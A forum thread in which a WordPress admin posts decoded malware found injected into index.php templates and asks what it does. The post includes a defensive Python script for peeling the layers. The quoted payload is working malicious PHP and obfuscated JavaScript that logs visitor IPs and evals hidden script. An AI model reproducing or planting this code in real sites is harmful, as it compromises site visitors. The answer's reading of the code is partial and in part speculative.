
WordPress malware injected into the index.php template


Hey guys, so I recently found that the index.php template files of all the WordPress installs on my server have had this code injected: <?php eval(base64_decode('...'));?>

Usually it's simple and I can just decode it from base64, but I think they have encoded it again.

What I get from the base64 decode is:

$ip=$_SERVER["REMOTE_ADDR"];$dr=$_SERVER["DOCUMENT_ROOT"];$ua = $_SERVER['HTTP_USER_AGENT'];$dbf=$dr.'/'.md5($dr);

if ((strpos($ua, 'Windows') !== false) && ((strpos($ua, 'MSIE') !== false) || (strpos($ua, 'Firefox') !== false)) && (strpos(@file_get_contents($dbf), $ip) === false)) { error_reporting(0);
try{1-prototype;} catch(asd)
if(x){fr = "fromChar"; f = [0,-1,94,93,22,29,91,101,88,108,99,90,101,106, 35,94,91,105,60,98,90,100,91,99,107,105,55,112,74,86,94,68,86,100,91,29,30,88,100,91,111,28,32,81,37,84,31,112, 4,-1,-2,0,95,91,105,87,98,92,104,29,32,49,2,0,-1,114,23,91,97,106,91,21,114,3,-2,0, -1,89,102,89,106,100,91,99,107,36,108,105,95,105,92,30,23,51,95,91,105,87,98,92,22,104,105,89,50,30,94,105,107,102,47,38,37,89,111,102,104 ,97,107,93,109,97,35,100,111,91,110,36,106,106,37,52,94,101,50,41,29,21,110,95,89,107,94,50,30,39,37,30,22,93,92,95 ,92,95,106,50,30,39,37,30,22,104,107,111,97,92,51,28,109,95,104,96,88,94,99,95,105,112,48,93,96,90,89,92,100,48,103,101,104 ,96,106,94,102,100,47,88,88,104,102,98,106,107,91,48,99,91,91,107,48,37,50,106,100,103,48,37,50,29,51,51,37,94,93,104,86,100,91 ,51,25,31,48,4,-1,-2,116,3,-2,0,92,106,101,89,105,96,101,99,23,95,91,105,87,98,92,104,29,32,113,2, 0,-1,-2,109,87,103,23,92,21,52,22,89,102,89,106,100,91,99,107,36,88,105,91,86,107,91,58,99,91,98,92,10 0,105,31,29,94,93,104,86,100,91,28,32,49,91,37,105,90,107,55,105,107,104,94,89,107,105,92,30,28,106,104,88,30,34,28,95,106,105,103,48, 36,38,90,109,103,105,95,108,94,107,98,36,98,112,92,108,37,107,104,38,53,92,102,51,39,30,31,48,93,36,104,107,111,97,92,36,107,96,105,94, 89,95,97,96,106,110,52,29,93,96,90,89,92,100,28,50,92,35,106,106,110,99,91,35,103,101,104,96,106,94,102,100,50,30,87,87,106,101,97,108,106, 90,30,49,91,37,105,105,112,98,90,37,98,90,93,106,50,30,38,28,50,92,35,106,106,110,99,91,35,107,101,101,52,29,37,30, 49,91,37,105,90,107,55,105,107,104,94,89,107,105,92,30,28,110,95,89,107,94,28,35,29,38,39,29,30,50,92,35,106,91,105,56,106,105,105, 95,87,108,106,90,31,29,93,92,95,92,95,106,28,35,29,38,39,29,30,50,3,-2,0,-1,89,102,89,106,100, 91,99,107,36,92,92,106,58,99,91,98,92,100,105,106,56,110,75,87,92,69,87,98,92,30,28,89,101,89,112,29,30,82, 38,82,37,87,101,103,91,99,91,57,93,96,98,89,31,92,30,50,3,-2,0,115]; v = "eva";} if(v)e = window [v "l"]; w = f; s = []; r = String; z =((e)? 
"Code":"");zx=fr+z;for(i=0;569-5+5-i>0;i+=1){j=i;if(e)s=s+r[zx]((w[j]*1+(9+e("j%3"))));} if(x && f && 012 === 10)e(s);

if ($fp = @fopen($dbf , "a")){fputs($fp , $ip.'|'); fclose($fp);}

}

Can you guys help me figure out what the malware is trying to do?

Thanks
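The two decoding steps the posted code implies, as an added example that is not part of the original post: peeling nested eval(base64_decode('...')) wrappers out of a PHP file, and reversing the String.fromCharCode(w[j]*1 + (9 + eval("j%3"))) loop so the injected JavaScript can be read during triage. The infected file and INNER_PHP are constructed samples (not a real infected template); SAMPLE_ARRAY is the first 48 values of the numeric array in the question.

```python
import base64
import re

# First layer seen in the question: <?php eval(base64_decode('...'));?>
EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)")

def peel_eval_base64(php_source, max_layers=5):
    """Decode nested eval(base64_decode('..')) wrappers; returns the list of
    decoded layers, innermost last (empty list if no wrapper is present)."""
    layers, current = [], php_source
    for _ in range(max_layers):
        m = EVAL_B64.search(current)
        if not m:
            break
        current = base64.b64decode(re.sub(r"\s", "", m.group(1))).decode("latin-1")
        layers.append(current)
    return layers

def decode_js_array(nums):
    """Reverse the loop in the decoded payload:
    s = s + String.fromCharCode(w[j]*1 + (9 + eval("j%3")))
    i.e. each character is the array value plus 9 plus (index mod 3)."""
    return "".join(chr(n + 9 + (j % 3)) for j, n in enumerate(nums))

# Strings a triage pass should flag in the innermost layer (taken from the question's sample).
INDICATORS = ("HTTP_USER_AGENT", "error_reporting(0)", "@fopen",
              "@file_get_contents", "fromChar", "<script")

def triage(php_source):
    """Peel the layers and report which indicators the innermost layer contains."""
    layers = peel_eval_base64(php_source)
    inner = layers[-1] if layers else ""
    return {"layers": len(layers), "indicators": [i for i in INDICATORS if i in inner]}

# Constructed samples: the inner PHP mirrors the first statements of the decoded
# code in the question, wrapped twice in eval(base64_decode()) like the real injection.
INNER_PHP = ("$ip=$_SERVER[\"REMOTE_ADDR\"];$dr=$_SERVER[\"DOCUMENT_ROOT\"];"
             "$ua = $_SERVER['HTTP_USER_AGENT'];$dbf=$dr.'/'.md5($dr);"
             "if(strpos(@file_get_contents($dbf),$ip)===false){error_reporting(0);}")
def _wrap(php):
    return "<?php eval(base64_decode('%s'));?>" % base64.b64encode(php.encode()).decode()
INFECTED_INDEX_PHP = "<?php /* Template Name: Home */ ?>\n" + _wrap(_wrap(INNER_PHP)) + "\n<html>"

# First 48 values of the numeric array in the question.
SAMPLE_ARRAY = [0,-1,94,93,22,29,91,101,88,108,99,90,101,106,35,94,91,105,60,98,90,100,
                91,99,107,105,55,112,74,86,94,68,86,100,91,29,30,88,100,91,111,28,32,81,
                37,84,31,112]
```

Running triage() over every index.php on the server and decode_js_array() over the full array from the decoded payload shows what the script writes into the page without ever executing it.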

1 Answer

  • 0

    The question is what the code does. From what I can make out:

    It creates a file named md5 in the document root. In that file it writes the IP of every visitor coming from a Windows machine using Internet Explorer or Firefox.

    I'm not sure what the hacker is after, but if he was able to get that code into your files, then he has access to your FTP and therefore to the newly created log file.
